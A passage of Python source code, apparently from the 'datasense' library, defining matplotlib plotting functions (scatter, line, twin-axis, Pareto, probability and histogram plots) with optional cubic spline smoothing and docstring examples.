>>> X=series_x,
>>> y1=series_y1,
>>> y2=series_y2
>>> )
>>> plt.show()
Example 2
>>> series_x = ds.random_data(distribution='uniform')
>>> fig, ax = ds.plot_scatter_scatter_x_y1_y2(
>>> X=series_x,
>>> y1=series_y1,
>>> y2=series_y2,
>>> figsize=(8, 5),
>>> marker1='o',
>>> marker2='+',
>>> markersize1=8,
>>> markersize2=12,
>>> colour1='#cc3311',
>>> colour2='#ee3377',
>>> labellegendy1='y1',
>>> labellegendy2='y2'
>>> )
>>> ax.legend(frameon=False)
>>> plt.show()
'''
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
if smoothing is None:
if X.dtype in ['datetime64[ns]']:
format_dates(fig, ax)
ax.plot(
X,
y1,
marker=marker1,
markersize=markersize1,
linestyle=linestyle1,
linewidth=linewidth1,
color=colour1,
label=labellegendy1
)
ax.plot(
X,
y2,
marker=marker2,
markersize=markersize2,
linestyle=linestyle2,
linewidth=linewidth2,
color=colour2,
label=labellegendy2
)
elif smoothing == 'natural_cubic_spline':
if X.dtype in ['datetime64[ns]']:
XX = pd.to_numeric(X)
fig.autofmt_xdate()
else:
XX = X
model1 = natural_cubic_spline(
X=XX,
y=y1,
number_knots=number_knots
)
model2 = natural_cubic_spline(
X=XX,
y=y2,
number_knots=number_knots
)
ax.plot(
X,
model1.predict(X),
marker=marker1,
markersize=markersize1,
linestyle='None',
linewidth=linewidth1,
color=colour1
)
ax.plot(
X,
model2.predict(X),
marker=marker2,
markersize=markersize2,
linestyle='None',
linewidth=linewidth2,
color=colour2
)
ax.plot(
X,
model1.predict(XX),
marker='.',
linestyle='',
color=colour1
)
ax.plot(
X,
model2.predict(XX),
marker='.',
linestyle='',
color=colour2
)
return (fig, ax)
def plot_scatter_scatter_x1_x2_y1_y2(
X1: pd.Series,
X2: pd.Series,
y1: pd.Series,
y2: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
marker1: Optional[str] = '.',
marker2: Optional[str] = '.',
markersize1: Optional[int] = 8,
markersize2: Optional[int] = 8,
linestyle1: Optional[str] = 'None',
linestyle2: Optional[str] = 'None',
linewidth1: Optional[float] = 1,
linewidth2: Optional[float] = 1,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee',
labellegendy1: Optional[str] = None,
labellegendy2: Optional[str] = None
) -> Tuple[plt.Figure, axes.Axes]:
'''
Scatter plot of y1 versus X1.
Scatter plot of y2 versus X2.
Optional smoothing applied to y1, y2.
This graph is useful if y1 and y2 have the same units.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
Fit a piecewise cubic function the the constraint that the fitted curve is
linear outside the range of the knots. The fitter curve is continuously
differentiable to the second order at all of the knots.
Parameters
----------
X1 : pd.Series
The data to plot on the abscissa.
X2 : pd.Series
The data to plot on the abscissa.
y1 : pd.Series
The data to plot on the ordinate.
y2 : pd.Series
The data to plot on the ordinate.
figsize : Optional[Tuple[float, float]] = None
The (width, height) of the figure (in, in).
smoothing : Optional[str] = None
The type of smoothing to apply.
number_knots : Optional[int] = None
The number of knots for natural cubic spline smoothing.
marker1 : Optional[str] = '.'
The type of plot point for y1.
marker2 : Optional[str] = '.'
The type of plot point for y2.
markersize1 : Optional[int] = 8
The size of the plot point for y1.
markersize2 : Optional[int] = 8
The size of the plot point for y2.
linestyle1 : Optional[str] = 'None'
The style of the line for y1.
linestyle2 : Optional[str] = 'None'
The style of the line for y2.
linewidth1 : Optional[float] = 0
The width of the line for y1.
linewidth2 : Optional[float] = 0
The width of the line for y2.
colour1 : Optional[str] = '#0077bb'
The colour of the line for y1.
colour2 : Optional[str] = '#33bbee'
The colour of the line for y2.
labellegendy1 : Optional[str] = None
The legend label of the line y1.
labellegendy2 : Optional[str] = None
The legend label of the line y2.
Returns
-------
Tuple[plt.Figure, axes.Axes]
A matplotlib figure and Axes tuple.
Examples
--------
Example 1
>>> import matplotlib.pyplot as plt
>>> import datasense as ds
>>>
>>> series_x1 = ds.datetime_data()
>>> series_x2 = ds.datetime_data()
>>> series_y1 = ds.random_data()
>>> series_y2 = ds.random_data()
>>> fig, ax = ds.plot_scatter_scatter_x1_x2_y1_y2(
>>> X1=series_x1,
>>> X2=series_x2,
>>> y1=series_y1,
>>> y2=series_y2
>>> )
>>> plt.show()
Example 2
>>> plt.show()
>>> fig, ax = ds.plot_scatter_scatter_x1_x2_y1_y2(
>>> X1=series_x1,
>>> X2=series_x2,
>>> y1=series_y1,
>>> y2=series_y2,
>>> smoothing='natural_cubic_spline',
>>> number_knots=7
>>> )
>>> plt.show()
Example 3
>>> series_x1 = ds.random_data(distribution='uniform').sort_values()
>>> series_x2 = ds.random_data(distribution='uniform').sort_values()
>>> fig, ax = ds.plot_scatter_scatter_x1_x2_y1_y2(
>>> X1=series_x1,
>>> X2=series_x2,
>>> y1=series_y1,
>>> y2=series_y2,
>>> figsize=(8, 5),
>>> marker1='o',
>>> marker2='+',
>>> markersize1=8,
>>> markersize2=12,
>>> colour1='#cc3311',
>>> colour2='#ee3377',
>>> labellegendy1='y1',
>>> labellegendy2='y2'
>>> )
>>> ax.legend(frameon=False)
>>> plt.show()
Example 4
>>> fig, ax = ds.plot_scatter_scatter_x1_x2_y1_y2(
>>> X1=series_x1,
>>> X2=series_x2,
>>> y1=series_y1,
>>> y2=series_y2,
>>> figsize=(8, 5),
>>> marker1='o',
>>> marker2='+',
>>> markersize1=8,
>>> markersize2=12,
>>> colour1='#cc3311',
>>> colour2='#ee3377',
>>> labellegendy1='y1',
>>> labellegendy2='y2',
>>> smoothing='natural_cubic_spline',
>>> number_knots=7
>>> )
>>> ax.legend(frameon=False)
>>> plt.show()
'''
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
if smoothing is None:
if (X1.dtype and X2.dtype) in ['datetime64[ns]']:
format_dates(fig, ax)
ax.plot(
X1,
y1,
marker=marker1,
markersize=markersize1,
linestyle=linestyle1,
linewidth=linewidth1,
color=colour1,
label=labellegendy1
)
ax.plot(
X2,
y2,
marker=marker2,
markersize=markersize2,
linestyle=linestyle2,
linewidth=linewidth2,
color=colour2,
label=labellegendy2
)
elif smoothing == 'natural_cubic_spline':
if (X1.dtype and X2.dtype) in ['datetime64[ns]']:
XX1 = pd.to_numeric(X1)
XX2 = pd.to_numeric(X2)
fig.autofmt_xdate()
else:
XX1 = X1
XX2 = X2
model1 = natural_cubic_spline(
X=XX1,
y=y1,
number_knots=number_knots
)
model2 = natural_cubic_spline(
X=XX2,
y=y2,
number_knots=number_knots
)
ax.plot(
X1,
y1,
marker=marker1,
markersize=markersize1,
linestyle=linestyle1,
linewidth=linewidth1,
color=colour1,
label=labellegendy1
)
ax.plot(
X2,
y2,
marker=marker2,
markersize=markersize2,
linestyle=linestyle2,
linewidth=linewidth2,
color=colour2,
label=labellegendy2
)
ax.plot(
X1,
model1.predict(XX1),
marker=marker1,
markersize=0,
linestyle='-',
linewidth=linewidth1,
color=colour1
)
ax.plot(
X2,
model2.predict(XX2),
marker=marker2,
markersize=0,
linestyle='-',
linewidth=linewidth2,
color=colour2
)
return (fig, ax)
def plot_scatter_line_x_y1_y2(
X: pd.Series,
y1: pd.Series,
y2: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee',
labellegendy1: Optional[str] = None,
labellegendy2: Optional[str] = None
) -> Tuple[plt.Figure, axes.Axes]:
'''
Scatter plot of y1 versus X.
Line plot of y2 versus X.
Optional smoothing applied to y1, y2.
This graph is useful if y1 and y2 have the same units.
X: series for horizontal axis
y1: series for y1 to plot on vertical axis
y2: series for y2 to plot on vertical axis
smoothing: str
Optional: natural_cubic_spline
number_knots: positive integer
The number of knots to create.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
Fit a piecewise cubic function the the constraint that the fitted curve is
linear outside the range of the knots. The fitter curve is continuously
differentiable to the second order at all of the knots.
'''
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
if smoothing is None:
if X.dtype in ['datetime64[ns]']:
format_dates(fig, ax)
ax.plot(
X,
y1,
marker='.',
linestyle='',
color=colour1,
label=labellegendy1
)
ax.plot(
X,
y2,
marker=None,
linestyle='-',
color=colour2,
label=labellegendy2
)
elif smoothing == 'natural_cubic_spline':
if X.dtype in ['datetime64[ns]']:
XX = pd.to_numeric(X)
fig.autofmt_xdate()
else:
XX = X
model1 = natural_cubic_spline(
X=XX,
y=y1,
number_knots=number_knots
)
model2 = natural_cubic_spline(
X=XX,
y=y2,
number_knots=number_knots
)
ax.plot(
X,
model1.predict(XX),
marker='.',
linestyle='',
color=colour1
)
ax.plot(
X,
model2.predict(XX),
marker=None,
linestyle='-',
color=colour2
)
return (fig, ax)
def plot_line_line_y1_y2(
y1: pd.Series,
y2: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
marker1: Optional[str] = '.',
marker2: Optional[str] = '.',
markersize1: Optional[int] = 8,
markersize2: Optional[int] = 8,
linestyle1: Optional[str] = '-',
linestyle2: Optional[str] = '-',
linewidth1: Optional[float] = 1,
linewidth2: Optional[float] = 1,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee',
labellegendy1: Optional[str] = None,
labellegendy2: Optional[str] = None
) -> Tuple[plt.Figure, axes.Axes]:
"""
Line plot of y1 and y2.
Optional smoothing applied to y1 and y2.
y1 and y2 are of the same length.
y1 and y2 have the same units.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
Fit a piecewise cubic function the the constraint that the fitted curve is
linear outside the range of the knots. The fitter curve is continuously
differentiable to the second order at all of the knots.
Parameters
----------
y1 : pd.Series
The data to plot on the ordinate.
y2 : pd.Series
The data to plot on the ordinate.
figsize : Optional[Tuple[float, float]] = None
The (width, height) of the figure (in, in).
smoothing : Optional[str] = None
The type of smoothing to apply.
number_knots : Optional[int] = None
The number of knots for natural cubic spline smoothing.
marker1 : Optional[str] = '.'
The type of plot point for y1.
marker2 : Optional[str] = '.'
The type of plot point for y2.
markersize1 : Optional[int] = 8
The size of the plot point for y1.
markersize2 : Optional[int] = 8
The size of the plot point for y2.
linestyle1 : Optional[str] = 'None'
The style of the line for y1.
linestyle2 : Optional[str] = 'None'
The style of the line for y2.
linewidth1 : Optional[float] = 0
The width of the line for y1.
linewidth2 : Optional[float] = 0
The width of the line for y2.
colour1 : Optional[str] = '#0077bb'
The colour of the line for y1.
colour2 : Optional[str] = '#33bbee'
The colour of the line for y2.
labellegendy1 : Optional[str] = None
The legend label of the line y1.
labellegendy2 : Optional[str] = None
The legend label of the line y2.
Returns
-------
Tuple[plt.Figure, axes.Axes]
A matplotlib figure and Axes tuple.
Example
-------
>>> import matplotlib.pyplot as plt
>>> import datasense as ds
>>>
>>> series_y1 = ds.random_data()
>>> series_y2 = ds.random_data()
>>> fig, ax = ds.plot_line_line_y1_y2(
>>> y1=series_y1,
>>> y2=series_y2
>>> )
>>> plt.show()
"""
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
X = pd.Series(range(1, y1.size + 1, 1))
if smoothing is None:
ax.plot(
X,
y1,
marker=marker1,
markersize=markersize1,
linestyle=linestyle1,
linewidth=linewidth1,
color=colour1,
label=labellegendy1
)
ax.plot(
X,
y2,
marker=marker2,
markersize=markersize2,
linestyle=linestyle2,
linewidth=linewidth2,
color=colour2,
label=labellegendy2
)
elif smoothing == 'natural_cubic_spline':
model1 = natural_cubic_spline(
X=X,
y=y1,
number_knots=number_knots
)
model2 = natural_cubic_spline(
X=X,
y=y2,
number_knots=number_knots
)
ax.plot(
X,
model1.predict(X),
marker=None,
linestyle='-',
color=colour1
)
ax.plot(
X,
model2.predict(X),
marker=None,
linestyle='-',
color=colour2
)
return (fig, ax)
def plot_line_line_x_y1_y2(
X: pd.Series,
y1: pd.Series,
y2: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
marker1: Optional[str] = '.',
marker2: Optional[str] = '.',
markersize1: Optional[int] = 8,
markersize2: Optional[int] = 8,
linestyle1: Optional[str] = '-',
linestyle2: Optional[str] = '-',
linewidth1: Optional[float] = 1,
linewidth2: Optional[float] = 1,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee',
labellegendy1: Optional[str] = None,
labellegendy2: Optional[str] = None
) -> Tuple[plt.Figure, axes.Axes]:
'''
Line plot of y1 versus X.
Line plot of y2 versus X.
Optional smoothing applied to y1, y2.
This graph is useful if y1 and y2 have the same units.
X: series for horizontal axis
y1: series for y1 to plot on vertical axis
y2: series for y2 to plot on vertical axis
smoothing: str
Optional: natural_cubic_spline
number_knots: positive integer
The number of knots to create.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
Fit a piecewise cubic function the the constraint that the fitted curve is
linear outside the range of the knots. The fitter curve is continuously
differentiable to the second order at all of the knots.
'''
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
if smoothing is None:
if X.dtype in ['datetime64[ns]']:
format_dates(fig, ax)
ax.plot(
X,
y1,
marker=marker1,
markersize=markersize1,
linestyle=linestyle1,
linewidth=linewidth1,
color=colour1,
label=labellegendy1
)
ax.plot(
X,
y2,
marker=marker2,
markersize=markersize2,
linestyle=linestyle2,
linewidth=linewidth2,
color=colour2,
label=labellegendy2
)
elif smoothing == 'natural_cubic_spline':
if X.dtype in ['datetime64[ns]']:
XX = pd.to_numeric(X)
fig.autofmt_xdate()
else:
XX = X
model1 = natural_cubic_spline(
X=XX,
y=y1,
number_knots=number_knots
)
model2 = natural_cubic_spline(
X=XX,
y=y2,
number_knots=number_knots
)
ax.plot(
X,
model1.predict(XX),
marker=None,
linestyle='-',
color=colour1
)
ax.plot(
X,
model2.predict(XX),
marker=None,
linestyle='-',
color=colour2
)
return (fig, ax)
def plot_line_line_line_x_y1_y2_y3(
X: pd.Series,
y1: pd.Series,
y2: pd.Series,
y3: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee',
colour3: Optional[str] = '#009988',
labellegendy1: Optional[str] = None,
labellegendy2: Optional[str] = None,
labellegendy3: Optional[str] = None
) -> Tuple[plt.Figure, axes.Axes]:
'''
Line plot of y1 versus X.
Line plot of y2 versus X.
Line plot of y3 versus X.
Optional smoothing applied to y1, y2, y3.
This graph is useful if y1, y2, and y3 have the same units.
X: series for horizontal axis
y1: series for y1 to plot on vertical axis
y2: series for y2 to plot on vertical axis
y3: series for y3 to plot on vertical axis
smoothing: str
Optional: natural_cubic_spline
number_knots: positive integer
The number of knots to create.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
Fit a piecewise cubic function the the constraint that the fitted curve is
linear outside the range of the knots. The fitter curve is continuously
differentiable to the second order at all of the knots.
'''
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
if smoothing is None:
if X.dtype in ['datetime64[ns]']:
format_dates(fig, ax)
ax.plot(
X,
y1,
marker=None,
linestyle='-',
color=colour1,
label=labellegendy1
)
ax.plot(
X,
y2,
marker=None,
linestyle='-',
color=colour2,
label=labellegendy2
)
ax.plot(
X,
y3,
marker=None,
linestyle='-',
color=colour3,
label=labellegendy3
)
elif smoothing == 'natural_cubic_spline':
if X.dtype in ['datetime64[ns]']:
XX = pd.to_numeric(X)
fig.autofmt_xdate()
else:
XX = X
model1 = natural_cubic_spline(
X=XX,
y=y1,
number_knots=number_knots
)
model2 = natural_cubic_spline(
X=XX,
y=y2,
number_knots=number_knots
)
model3 = natural_cubic_spline(
X=XX,
y=y3,
number_knots=number_knots
)
ax.plot(
X,
model1.predict(XX),
marker=None,
linestyle='-',
color=colour1
)
ax.plot(
X,
model2.predict(XX),
marker=None,
linestyle='-',
color=colour2
)
ax.plot(
X,
model3.predict(XX),
marker=None,
linestyle='-',
color=colour3
)
return (fig, ax)
def plot_scatterleft_scatterright_x_y1_y2(
X: pd.Series,
y1: pd.Series,
y2: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee',
linestyle1: Optional[str] = 'None',
linestyle2: Optional[str] = 'None'
) -> Tuple[plt.Figure, axes.Axes, axes.Axes]:
'''
Scatter plot of y1 left vertical axis versus X.
Scatter plot of y2 right vertical axis versus X.
Optional smoothing applied to y1, y2.
This graph is useful if y1 and y2 have different units or scales,
and you wish to see if they are correlated.
X: series for horizontal axis
y1: series for y1 to plot using left vertical axis
y2: series for y2 to plot using right vertical axis
smoothing: str
Optional: natural_cubic_spline
number_knots: positive integer
The number of knots to create.
linestyle1 : Optional[str] = 'None'
The style of the line joining the points.
linestyle2 : Optional[str] = 'None'
The style of the line joining the points.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
Fit a piecewise cubic function the the constraint that the fitted curve is
linear outside the range of the knots. The fitter curve is continuously
differentiable to the second order at all of the knots.
'''
fig = plt.figure(figsize=figsize)
ax1 = fig.add_subplot(111)
ax2 = ax1.twinx()
if smoothing is None:
if X.dtype in ['datetime64[ns]']:
format_dates(fig, ax1)
ax1.plot(
X,
y1,
marker='.',
linestyle=linestyle1,
color=colour1
)
ax2.plot(
X,
y2,
marker='.',
linestyle=linestyle2,
color=colour2
)
elif smoothing == 'natural_cubic_spline':
if X.dtype in ['datetime64[ns]']:
XX = pd.to_numeric(X)
fig.autofmt_xdate()
else:
XX = X
model1 = natural_cubic_spline(
X=XX,
y=y1,
number_knots=number_knots
)
model2 = natural_cubic_spline(
X=XX,
y=y2,
number_knots=number_knots
)
ax1.plot(
X,
model1.predict(XX),
marker='.',
linestyle=linestyle1,
color=colour1
)
ax2.plot(
X,
model2.predict(XX),
marker='.',
linestyle=linestyle2,
color=colour2
)
for tl in ax1.get_yticklabels():
tl.set_color(colour1)
for tl in ax2.get_yticklabels():
tl.set_color(colour2)
return (fig, ax1, ax2)
def plot_lineleft_lineright_x_y1_y2(
X: pd.Series,
y1: pd.Series,
y2: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee',
linestyle1: Optional[str] = '-',
linestyle2: Optional[str] = '-',
marker1: Optional[str] = '.',
marker1size: Optional[float] = 8,
marker2: Optional[str] = '.',
marker2size: Optional[float] = 8,
) -> Tuple[plt.Figure, axes.Axes, axes.Axes]:
'''
Line plot of y1 left vertical axis versus X.
Line plot of y2 right vertical axis versus X.
Optional smoothing applied to y1, y2.
This graph is useful if y1 and y2 have different units or scales,
and you wish to see if they are correlated.
X: series for horizontal axis
y1: series for y1 to plot using left vertical axis
y2: series for y2 to plot using right vertical axis
smoothing: str
Optional: natural_cubic_spline
number_knots: positive integer
The number of knots to create.
linestyle1: Optional[str] = '-'
The style of the line joining the points.
linestyle2: Optional[str] = '-'
The style of the line joining the points.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
Fit a piecewise cubic function the the constraint that the fitted curve is
linear outside the range of the knots. The fitter curve is continuously
differentiable to the second order at all of the knots.
'''
fig = plt.figure(figsize=figsize)
ax1 = fig.add_subplot(111)
ax2 = ax1.twinx()
if smoothing is None:
if X.dtype in ['datetime64[ns]']:
format_dates(fig, ax1)
ax1.plot(
X,
y1,
color=colour1,
marker=marker1,
markersize=marker1size
)
ax2.plot(
X,
y2,
color=colour2,
marker=marker2,
markersize=marker2size
)
elif smoothing == 'natural_cubic_spline':
if X.dtype in ['datetime64[ns]']:
XX = pd.to_numeric(X)
fig.autofmt_xdate()
else:
XX = X
model1 = natural_cubic_spline(
X=XX,
y=y1,
number_knots=number_knots
)
model2 = natural_cubic_spline(
X=XX,
y=y2,
number_knots=number_knots
)
ax1.plot(
X,
model1.predict(XX),
color=colour1,
linestyle=linestyle1
)
ax2.plot(
X,
model2.predict(XX),
color=colour2,
linestyle=linestyle2
)
for tl in ax1.get_yticklabels():
tl.set_color(colour1)
for tl in ax2.get_yticklabels():
tl.set_color(colour2)
return (fig, ax1, ax2)
def plot_barleft_lineright_x_y1_y2(
X: pd.Series,
y1: pd.Series,
y2: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
smoothing: Optional[str] = None,
number_knots: Optional[int] = None,
barwidth: Optional[float] = 10,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee',
linestyle1: Optional[str] = '-',
linestyle2: Optional[str] = '-',
marker2: Optional[str] = 'o'
) -> Tuple[plt.Figure, axes.Axes, axes.Axes]:
'''
Bar plot of y1 left vertical axis versus X.
Line plot of y2 right vertical axis versus X.
Optional smoothing applied to y1, y2.
This graph is useful if y1 and y2 have different units or scales,
and you wish to see if they are correlated.
X: series for horizontal axis
y1: series for y1 to plot using left vertical axis
y2: series for y2 to plot using right vertical axis
smoothing: str
Optional: natural_cubic_spline
number_knots: positive integer
The number of knots to create.
linestyle1: Optional[str] = '-'
The style of the line joining the points.
linestyle2: Optional[str] = '-'
The style of the line joining the points.
If smoothing is applied, the series must not contain NaN, inf, or -inf.
Fit a piecewise cubic function the the constraint that the fitted curve is
linear outside the range of the knots. The fitter curve is continuously
differentiable to the second order at all of the knots.
'''
fig = plt.figure(figsize=figsize)
ax1 = fig.add_subplot(111)
ax2 = ax1.twinx()
if smoothing is None:
if X.dtype in ['datetime64[ns]']:
format_dates(fig, ax1)
ax1.bar(
X,
y1,
barwidth,
color=colour1
)
ax2.plot(
X,
y2,
color=colour2,
marker=marker2
)
elif smoothing == 'natural_cubic_spline':
if X.dtype in ['datetime64[ns]']:
XX = pd.to_numeric(X)
fig.autofmt_xdate()
else:
XX = X
model1 = natural_cubic_spline(
X=XX,
y=y1,
number_knots=number_knots
)
model2 = natural_cubic_spline(
X=XX,
y=y2,
number_knots=number_knots
)
ax1.plot(
X,
model1.predict(XX),
color=colour1,
linestyle=linestyle1
)
ax2.plot(
X,
model2.predict(XX),
color=colour2,
linestyle=linestyle2
)
for tl in ax1.get_yticklabels():
tl.set_color(colour1)
for tl in ax2.get_yticklabels():
tl.set_color(colour2)
return (fig, ax1, ax2)
def plot_pareto(
X: pd.Series,
y: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
width: Optional[float] = 0.8,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee',
marker: Optional[str] = '.',
markersize: Optional[float] = 8,
linestyle: Optional[str] = '-',
) -> Tuple[plt.Figure, axes.Axes, axes.Axes]:
"""
X : pd.Series
The data to plot on the ordinate.
y : pd.Series
The data to plot on the abscissa.
figsize : Optional[Tuple[float, float]] = None
The (width, height) of the figure (in, in).
width : Optional[float] = 0.8
The width of the bars (in).
colour1 : Optional[str] = '#0077bb'
The colour of the line for y1.
colour2 : Optional[str] = '#33bbee'
The colour of the line for y2.
marker : Optional[str] = '.'
The type of plot point.
markersize : Optional[float] = 8
The size of the plot point (pt).
linestyle : Optional[str] = '-'
The style of the line joining the points.
Returns
-------
Tuple[plt.Figure, axes.Axes, axes.Axes]
A matplotlib figure and Axes tuple.
Examples
--------
Example 1
>>> import matplotlib.pyplot as plt
>>> import datasense as ds
>>> data = pd.DataFrame(
>>> {
>>> 'ordinate': ['Mo', 'Larry', 'Curly', 'Shemp', 'Joe'],
>>> 'abscissa': [21, 2, 10, 4, 16]
>>> }
>>> )
>>> fig, ax1, ax2 = ds.plot_pareto(
>>> X=data['ordinate'],
>>> y=data['abscissa']
>>> )
>>> plt.show()
"""
df = pd.concat(
[X, y],
axis=1
).sort_values(
by=y.name,
axis=0,
ascending=False,
kind='mergesort'
)
total_y = df[y.name].sum()
df['percentage'] = df[y.name] / total_y * 100
df['cumulative_percentage'] = df['percentage'].cumsum(skipna=True)
fig = plt.figure(figsize=figsize)
ax1 = fig.add_subplot(111)
ax2 = ax1.twinx()
ax1.bar(
x=df[X.name],
height=df[y.name],
width=width,
color=colour1
)
ax2.plot(
df[X.name],
df['cumulative_percentage'],
marker=marker,
markersize=markersize,
linestyle=linestyle,
color=colour2
)
return (fig, ax1, ax2)
def format_dates(
fig: plt.figure,
ax: axes.Axes
) -> None:
'''
Format dates and ticks for plotting.
'''
loc = mdates.AutoDateLocator()
fmt = mdates.AutoDateFormatter(loc)
ax.xaxis.set_major_locator(loc)
ax.xaxis.set_major_formatter(fmt)
fig.autofmt_xdate()
def probability_plot(
data: pd.Series,
*,
figsize: Optional[Tuple[float, float]] = None,
distribution: Optional[object] = norm,
fit: Optional[bool] = True,
plot: Optional[object] = None,
colour1: Optional[str] = '#0077bb',
colour2: Optional[str] = '#33bbee'
) -> Tuple[plt.Figure, axes.Axes]:
"""
Plot a probability plot of data against the quantiles of a specified
theoretical distribution.
Parameters
----------
data : pd.Series
A pandas Series.
figsize : Optional[Tuple[flot, float]]
The (width, height) of the figure (in, in).
distribution : Optional[object] = norm
Fit a normal distribution by default.
fit : Optional[bool] = True
Fit a least-squares regression line to the data if True.
plot : Optional[object] = None
If given, plot the quantiles and least-squares fit.
Returns
-------
Tuple[plt.Figure, axes.Axes]
A matplotlib figure and Axes tuple.
Example
-------
>>> import matplotlib.pyplot as plt
>>> import datasense as ds
>>>
>>> data = ds.random_data()
>>> fig, ax = ds.probability_plot(data=data)
>>> plt.show()
"""
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
(osm, osr), (slope, intercept, r) = probplot(
x=data,
dist=distribution,
fit=True,
plot=ax
)
ax.get_lines()[0].set_markerfacecolor(colour1)
ax.get_lines()[0].set_markeredgecolor(colour1)
ax.get_lines()[1].set_color(colour2)
return (fig, ax)
def despine(ax: axes.Axes) -> None:
"""
Remove the top and right spines of a graph.
Parameters
----------
ax : axes.Axes
Example
-------
>>> despine(ax)
"""
for spine in 'right', 'top':
ax.spines[spine].set_visible(False)
def plot_histogram(
s: pd.Series,
*,
number_bins: Optional[int] = None,
bin_range: Union[Tuple[int, int], Tuple[int, int]] = None,
figsize: Optional[Tuple[int, int]] = (8, 6),
bin_width: Optional[int] = None,
edgecolor: Optional[str] = '#ffffff',
linewidth: Optional[int] = 1,
bin_label_bool: Optional[bool] = False,
color: Optional[str] = '#0077bb'
) -> Tuple[plt.Figure, axes.Axes]:
"""
Parameters
----------
s : pd.Series
The input series.
number_bins : Optional[int] = None
The number of equal-width bins in the range s.max() - s.min().
bin_range : Union[Tuple[int, int],Tuple[int, int]] = None,
The lower and upper range of the bins. If not provided, range is
(s.min(), s.max()).
figsize : Optional[Tuple[int, int]] = (8, 6),
The figure size width, height (inch).
bin_width : Optional[int] = None,
The width of the bin in same units as the series s.
edgecolor : Optional[str] = '#ffffff',
The hexadecimal color value for the bar edges.
linewidth : Optional[int] = 1,
The bar edges line width (point).
bin_label_bool : Optional[bool] = False
If True, label the bars with count and percentage of total.
color : Optional[str] = '#0077bb'
The color of the bar faces.
Returns
-------
fig, ax : Tuple[plt.Figure, axes.Axes]
Examples
--------
Example 1
# Create a series of random floats, normal distribution,
# with the default parameters.
>>> import datasense as ds
>>> s = ds.random_data()
>>> fig, ax = ds.plot_histogram(s=s)
Example 2
# Create a series of random integers, integer distribution, size = 113,
# min = 0, max = 13.
>>> import datasense as ds
>>> s = ds.random_data(
>>> distribution='randint',
>>> size=113,
>>> low=0,
>>> high=14
>>> )
>>> fig, ax = ds.plot_histogram(s=s)
Example 3
# Create a series of random integers, integer distribution, size = 113,
# min = 0, max = 13.
# Set histogram parameters to control bin width.
>>> s = ds.random_data(
>>> distribution='randint',
>>> size=113,
>>> low=0,
>>> high=14
>>> )
>>> fig, ax = ds.plot_histogram(
>>> s=s,
>>> bin_width=1
)
Example 4
# Create a series of random integers, integer distribution, size = 113,
# min = 0, hight = 14,
# Set histogram parameters to control bin width and plotting range.
>>> s = ds.random_data(
>>> distribution='randint',
>>> size=113,
>>> low=0,
>>> high=13
>>> )
>>> fig, ax = ds.plot_histogram(
>>> s=s,
>>> bin_width=1,
>>> bin_range=(0, 10)
>>> )
Example 5
# Create a series of random floats, size = 113,
# average = 69, standard deviation = 13.
# Set histogram parameters to control bin width and plotting range.
>>> s = ds.random_data(
>>> distribution='norm',
>>> size=113,
>>> loc=69,
>>> scale=13
>>> )
>>> fig, ax = ds.plot_histogram(
>>> s=s,
>>> bin_width=5,
>>> bin_range=(30, 110)
>>> )
Example 6
# Create a series of random floats, size = 113,
# average = 69, standard deviation = 13.
# Set histogram parameters to control bin width, plotting range, labels.
# Set colour of the bars.
>>> s = ds.random_data(
>>> distribution='norm',
>>> size=113,
>>> loc=69,
>>> scale=13
>>> )
>>> fig, ax = ds.plot_histogram(
>>> s=s,
>>> bin_width=5,
>>> bin_range=(30, 110),
>>> figsize=(10,8),
>>> bin_label_bool=True,
>>> color='#33bbee'
>>> )
"""
fig = plt.figure(figsize=figsize)
ax = fig.add_subplot(111)
if bin_width and not bin_range:
x = (s.max() - s.min()) / bin_width
number_bins = math.ceil(x)
elif bin_width and bin_range:
number_bins = int((bin_range[1] - bin_range[0]) / bin_width)
bin_range = bin_range
counts, bins, patches = ax.hist(
x=s,
bins=number_bins,
range=bin_range,
edgecolor=edgecolor,
linewidth=linewidth,
color=color
)
if bin_label_bool:
ax.set_xticks(bins)
ax.xaxis.set_major_formatter(FormatStrFormatter('%0.0f'))
bin_centers = 0.5 * np.diff(bins) + bins[:-1]
for count, x in zip(counts, bin_centers):
ax.annotate(
text=f'{str(int(count))}',
xy=(x, 0),
xytext=(0, -18),
xycoords=(
'data',
'axes fraction'
),
textcoords='offset points',
